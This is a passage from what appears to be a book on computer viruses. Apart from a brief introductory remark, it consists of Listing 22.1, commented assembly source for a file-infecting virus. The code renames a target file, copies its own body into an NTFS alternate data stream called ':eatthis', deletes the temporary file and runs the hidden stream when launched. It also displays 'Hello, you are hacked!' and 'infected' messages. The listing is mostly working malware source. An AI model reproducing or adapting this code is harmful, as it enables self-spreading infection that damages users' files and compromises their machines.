Natural languages practically never cope with the task of describing computer algorithms. They are too ambiguous and full of contradictions.
Provided in Listing 22.1 is the source code of the key fragment of the virus with comments. Technical details are omitted here. They are supplied on the companion CD-ROM of this book in the file named xcode.asm.
section '.code' code readable executable start: ; Delete the temporary file. PUSH shutdown CALL [DeleteFile] ; Determine the name. PUSH 1000 PUSH buf PUSH 0 CALL [GetModuleFileName] ; Read the command line. ; The --* file name option - infect CALL [GetCommandLine] MOV EBP, EAX XOR EBX, EBX MOV ECX, 202A2D2Dh ; rool: CMP [EAX], ECX ; Is this "--*"? JZ infect INC EAX CMP [EAX], EBX ; End of the command line? JNZ rool ; Output the diagnostic message ; confirming the virus's presence in the file. PUSH 0 PUSH aInfected PUSH aHello PUSH 0 CALL [MessageBox] ; Add the name of the NTFS stream to the file name. MOV ESI, code_name MOV EDI, buf MOV ECX, 100; code_name_end - code_name XOR EAX, EAX REPNE SCASB DEC EDI REP MOVSB ; Start the NTFS stream for execution. PUSH xxx PUSH xxx PUSH EAX PUSH EAX PUSH EAX PUSH EAX PUSH EAX PUSH EAX PUSH EBP PUSH buf CALL [CreateProcess] JMP go2exit ;Exit the virus. infect: ; Set eax to the first character of the target file ; (from now on, called the destination, or dst for short). ADD EAX, 4 XCHG EAX, EBP XOR EAX, EAX INC EAX ; Check the dst for infection. ; Rename dst as shutdown PUSH shutdown PUSH EBP CALL [RenameFile] ; Copy the main stream of dst into shutdown. PUSH EAX PUSH EBP PUSH BUF CALL [CopyFile] ; Add the NTFS stream name to the new name. MOV ESI, EBP MOV EDI, buf copy_rool: LODSB STOSB TEST AL, AL JNZ copy_rool MOV ESI, code_name DEC EDI copy_rool2: LODSB STOSB TEST AL, AL JNZ copy_rool2 ; Copy shutdown into dst:eatthis. PUSH EAX PUSH buf PUSH shutdown CALL [CopyFile] ; Length of correction of the file to be infected ; Delete shutdown. PUSH shutdown CALL [DeleteFile] ; Output the diagnostic message ; confirming successful infection. PUSH 0 PUSH aInfected PUSH EBP PUSH 0 CALL [MessageBox] ; Exit the virus. go2exit: PUSH 0 CALL [ExitProcess] section '.data' data readable writeable shutdown DB "shutdown", 0 ; Name of the temporary file code_name DB ":eatthis", 0 ; Name of the stream, in which code_name_end: ; the main body will be stored ; Various text strings displayed by the virus aInfected DB "infected",0 aHello DB "Hello, you are hacked!" ; Various buffers for auxiliary purposes buf RB 1000 xxx RB 1000